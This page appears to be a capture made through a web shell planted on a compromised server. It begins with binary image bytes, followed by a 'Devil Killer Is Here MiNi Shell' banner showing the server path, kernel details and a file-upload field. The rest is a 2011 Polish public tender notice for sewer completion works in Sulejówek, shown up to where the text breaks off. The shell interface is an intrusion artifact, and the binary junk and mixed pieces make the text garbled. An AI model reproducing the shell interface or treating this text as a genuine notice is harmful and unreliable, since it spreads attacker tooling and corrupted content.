JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111024/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111024/278419-N-2011.html

<p class="kh_header"><b>Sulejówek: Wykonanie robót  sanitarnych związanych z dokończeniem  prac po dotychczasowym Wykonawcy robót kanalizacyjnych w Sulejówku</b><br>
<b>Numer ogłoszenia: 278419 - 2011; data zamieszczenia: 24.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> EKO-INWESTYCJA Sp. z ograniczoną odpowiedzialnością , ul. Dworcowa 55, 05-070 Sulejówek, woj. mazowieckie, tel. 22 783 00 42, faks 22 783 00 42.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ekoinwestycja.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót  sanitarnych związanych z dokończeniem  prac po dotychczasowym Wykonawcy robót kanalizacyjnych w Sulejówku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres prac objętych zamówieniem obejmuje:

W zakresie zadania 2a
a)	dokończenie robót w ul. Nałkowskiej, w tym:
-	wykonanie, zgodnie z Dokumentacją Projektową oraz wymaganiami STWIORB, ok. 118 m kanalizacji grawitacyjnej DN 200 wraz z 8 szt. odgałęzień DN 160 
- zabezpieczenie włazu studni DN 425 wykonanej przez poprzedniego Wykonawcę płytą betonową O1000 mm o grubości 16 cm
-	odtworzenie nawierzchni zgodnie z Warunkami technicznymi odtworzenia nawierzchni w pasie dróg gminnych,

W zakresie zadania 2b
a)	dokończenie robót w ul. Dąbrowskiego, w tym:
- wykonanie, zgodnie z Dokumentacją Projektową oraz wymaganiami STWIORB, ok. 105.5 m kanalizacji grawitacyjnej DN 200 (odcinek od studni 2/175 do studni 2/183) 
- wykonanie 11 szt. odgałęzień  DN 160 (10 szt. ujętych w Dokumentacji Projektowej oraz 1 szt. dla którego należy wykonać dokumentację projektową) 
- wykonanie prac poprawkowych na odcinku od studni 2/173 do studni 2/175, wybudowanym przez poprzedniego wykonawcę, obejmujących uszczelnienie włączenia kanału do studni 2/173 oraz poprawienie połączenia rur kanalizacyjnych na odcinku ok. 10-go m od studni 2/173 w celu zlikwidowania nieszczelności
- zabezpieczenie włazów studni DN 425 (2 szt.) wykonanych przez poprzedniego wykonawcę płytami betonowymi O1000 mm o grubości 16 cm
-	odtworzenie nawierzchni zgodnie z Warunkami technicznymi odtworzenia nawierzchni w pasie dróg gminnych, w tym również na odcinku, w którym roboty kanalizacyjne wykonywał poprzedni wykonawca

b)	dokończenie robót w ul. Partyzantów na odcinku od ul. Armii Krajowej do ul. Chopina, w tym:
- wykonanie, zgodnie z Dokumentacją Projektową oraz wymaganiami STWIORB, ok. 299 m kanalizacji grawitacyjnej DN 200 (odcinek od studni 2/73 do studni 2/79, odcinek od studni 2/80 do studni 2/86, odcinek od studni 2/87 do studni 2/88, odcinek od studni 2/73 do studni 2/99) wraz z 21 szt. odgałęzień DN 160, a także wykonanie odcinka kanalizacji ok. 12 m pomiędzy wykonanymi przez poprzedniego wykonawcę studniami 2/79 i 2/80 
-wykonanie prac związanych z uszczelnieniem studni 2/80, wybudowanej przez poprzedniego wykonawcę
-zabezpieczenie włazów studni wykonanych przez poprzedniego wykonawcę płytami betonowymi, w przypadku studni DN 425 (2 szt.) płyty O1000 mm o grubości 16 cm, w przypadku studni DN 1200 (2 szt.) płyty O2000 mm o grubości 18 cm
-odtworzenie nawierzchni zgodnie z Warunkami technicznymi odtworzenia nawierzchni w pasie dróg gminnych, w tym również na odcinku, w którym roboty kanalizacyjne wykonywał poprzedni wykonawca


c)	wykonanie, zgodnie z Dokumentacją Projektową oraz wymaganiami STWIORB, ok. 51 m kanalizacji grawitacyjnej DN 200 w ul. Armii Krajowej na odcinku od ul. Mazowieckiej do ul. Partyzantów, (odcinek od studni 2/88 do studni 2/90) wraz z 2 szt. odgałęzień DN 160, wraz z odtworzeniem nawierzchni zgodnie z Warunkami technicznymi odtworzenia nawierzchni w pasie dróg gminnych 

d)	wykonanie, zgodnie z Dokumentacją Projektową oraz wymaganiami STWIORB, ok. 41,5 m kanalizacji grawitacyjnej DN 200 w ul. Słowackiego (od st. 2/73 do pompowni U8 oraz odcinek od studni 2/60 do studni 2/56) wraz z 1 szt. odgałęzienia DN 160, wraz z odtworzeniem nawierzchni zgodnie z Warunkami Technicznymi odtworzenia nawierzchni w pasie dróg gminnych 

e)	wykonanie, zgodnie z Dokumentacją Projektową oraz wymaganiami STWIORB,  pompowni U8 wraz z komorą zasuw, przyłączem wodociągowym oraz przyłączem energetycznym oraz kanalizacji tłocznej (36 m o średnicy Dn 90 oraz 2 x 3 m o średnicy DN 80)

W zakresie zadania 3:
a)	dokończenie robót w ul. Żeromskiego, obejmujące:
- zabezpieczenie włazów studni wykonanych przez poprzedniego Wykonawcę płytami betonowymi, w przypadku studni DN 425 (3 szt.) płyty O1000 mm o grubości 16 cm, w przypadku studni DN 1200 (6 szt.) płyty O2000 mm o grubości 18 cm
- odtworzenie nawierzchni zgodnie z Warunkami technicznymi odtworzenia nawierzchni w pasie dróg gminnych
b)	ul. Paderewskiego:
- zabezpieczenie włazów studni wykonanych przez poprzedniego Wykonawcę płytami betonowymi, w przypadku studni DN 425 (1 szt.) płyty O1000 mm o grubości 16 cm, w przypadku studni DN 1200 (8 szt.) płyty O2000 mm o grubości 18 cm
c)	ul. Wspólna
- zabezpieczenie włazów studni wykonanych przez poprzedniego Wykonawcę płytami betonowymi, w przypadku studni DN 425 (1szt.) płyty O1000 mm o grubości 16 cm, w przypadku studni DN 1200 9(szt.) płyty O2000 mm o grubości 18 cm

W zakresie zadania 4
a)	dokończenie robót w ul. Szymanowskiego, w tym:
- wykonanie, zgodnie z Dokumentacją Projektową oraz wymaganiami STWIORB, ok. 93 m kanalizacji grawitacyjnej DN 200 (na odcinku od studni 5 do studni 1), ok. 5 m kanalizacji grawitacyjnej DN 250 (na odcinku od studni 1 pompowni P4) 
 - wykonanie 10 szt. odgałęzień  DN 160,  (7 szt. ujętych w Dokumentacji Projektowej, 3 szt. dla których trasa została uzgodniona w ZUD)
- wymiana studni nr 8 DN 425 wykonanej przez poprzedniego wykonawcę 
-	zabezpieczenie włazów studni wykonanych przez poprzedniego wykonawcę płytami betonowymi, w przypadku studni DN 425 (5szt.) płytami O1000 mm o grubości 16 cm, w przypadku studni DN 1200 (7 szt.) płytami O2000 mm o grubości 18 cm
-	odtworzenie nawierzchni zgodnie z Warunkami technicznymi odtworzenia nawierzchni w pasie dróg gminnych, w tym również na odcinku robót wykonywanych przez poprzedniego wykonawcę

b)	dokończenie robót w ul. Starzyńskiego, w tym:
-	wykonanie, zgodnie z Dokumentacją Projektową (projektem zamiennym przekazanym przez Zamawiającego) oraz wymaganiami STWIORB, ok. 378 m kanalizacji grawitacyjnej DN 200 (na odcinku od studni 13 do studni 14 oraz na odcinku od studni 19 do studni 28), oraz ok. 2 m kanalizacji grawitacyjnej DN 250 (na odcinku od przepompowni P4 do studni 13), 
-	wykonanie 29 szt. odgałęzień w kierunku prywatnych posesji DN 160,  (22 szt. ujęte w Dokumentacji Projektowej, 4 szt. dla których zostały uzyskane opinie ZUD (4szt.), a także 3 szt. dla których należy opracować kompletną dokumentację projektową)
-	 wykonanie prac poprawkowych na odcinkach kanalizacji wykonanej przez poprzedniego wykonawcę, obejmujących przebudowę studni 14 oraz odcinka ok. 44m kanału DN 200 pomiędzy studnią 14 i studnią 15 oraz nabudowanie na odcinku pomiędzy studnią 17 i studnią 19 przewidzianej w projekcie zamiennym studni inspekcyjnej DN 425, wraz z obudową włazu płytą  betonową O1000 mm o grubości 16 cm
-	zabezpieczenie włazów studni DN 1200 (4szt.) wykonanych przez poprzedniego wykonawcę płytami betonowymi O2000 mm o grubości 18 cm
-	odtworzenie nawierzchni zgodnie z Warunkami technicznymi odtworzenia nawierzchni w pasie dróg gminnych, w tym również na odcinku, w którym roboty kanalizacyjne wykonywał poprzedni wykonawca

c)	budowa, zgodnie z Dokumentacją Projektową oraz wymaganiami STWIORB, pompowni ścieków P4  wraz z przyłączem wodociągowym i studzienką wodomierzową, przyłączem energetycznym oraz ok. 594 m przewodu tłocznego DN 160



W zakresie Zadania 5.1
a)	Dokończenie robót w ul. 1-szej Armii Wojska Polskiego, w tym:
-	wykonanie, zgodnie z Dokumentacją Projektową oraz wymaganiami STWIORB, ok. 6 m kanalizacji grawitacyjnej DN 200 na odcinku pomiędzy studnią S1 a studnią S2 w pobliżu drzewa kolidującego z trasą kanalizacji (wraz z wycinką przedmiotowego drzewa, na podstawie decyzji uzyskanej przez Zamawiającego)
-	zabezpieczenie włazów studni wykonanych przez poprzedniego wykonawcę płytami betonowymi, w przypadku studni DN 425 (1 szt.) płyty O1000 mm o grubości 16 cm, w przypadku studni DN 1200 (2 szt.) płyty O2000 mm o grubości 18 cm
-	odtworzenie nawierzchni zgodnie z Warunkami technicznymi odtworzenia nawierzchni w pasie dróg gminnych, w tym również na odcinku, w którym roboty kanalizacyjne wykonywał poprzedni wykonawca, obejmujące również prace związane z przełożeniem kostki betonowej w obrębie Sistn.
 
b)	Budowa kanalizacji w ul. Dworcowej na odcinku od ul. Puszkina do ul. 1-szej Armii Wojska Polskiego oraz na odcinku od ul. Piłsudzkiego do ul. 1-szej Armii Wojska Polskiego, obejmująca:
-	wykonanie, zgodnie z Dokumentacją Projektową oraz wymaganiami STWIORB, ok. 575,5 m kanalizacji grawitacyjnej DN 
-	wykonanie 22 szt. odgałęzień DN 160, zgodnie z załącznikiem nr 1 do niniejszej STWIORB (19 szt. ujętych w Dokumentacji Projektowej, 1 szt. dla którego trasa została uzgodniona w ZUD, 2 szt. dla których należy opracować dokumentację projektową)  
-	odtworzenie nawierzchni zgodnie z Warunkami technicznymi odtworzenia nawierzchni w pasie dróg gminnych, w tym również na odcinku, w którym roboty kanalizacyjne wykonywał poprzedni wykonawca.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza zamówienia uzupełniające w wysokości  20 % wartości zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.00.00-1, 45.20.00.00-9, 45.23.00.00-8, 45.23.10.00-5, 45.23.13.00-8, 45.23.20.00-2, 45.23.32.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.07.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej 1 robotę budowlaną polegającej na budowie kanalizacji sanitarnej na łączną kwotę 2 000 000,00 PLN (netto). 

Wykonawca może polegać na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Kopie dokumentów załączonych do oferty dotyczących tych podmiotów są poświadczane za zgodność z oryginałem przez te podmioty. 

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, Wykonawcy wykazują spełnianie tego warunku łącznie - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia Wykonawcy o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że posiada środki finansowe lub zdolność kredytową w wysokości co najmniej 2 000 000,00 PLN. 
Jeżeli z uzasadnionej przyczyny Wykonawca nie może przedstawić wymaganych dokumentów dotyczących sytuacji finansowej, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełniania powyższego warunku. 

Wykonawca może polegać na zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, Wykonawcy wykazują spełnianie tego warunku łącznie  - w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. W przypadku konieczności przeliczenia wartości z innej waluty niż określono w Sekcji III.3.2) lub Sekcji III.3.5) należy zastosować średni kurs NBP z dnia publikacji ogłoszenia dotyczącego niniejszego przetargu w BZP.
2. Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
3. Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
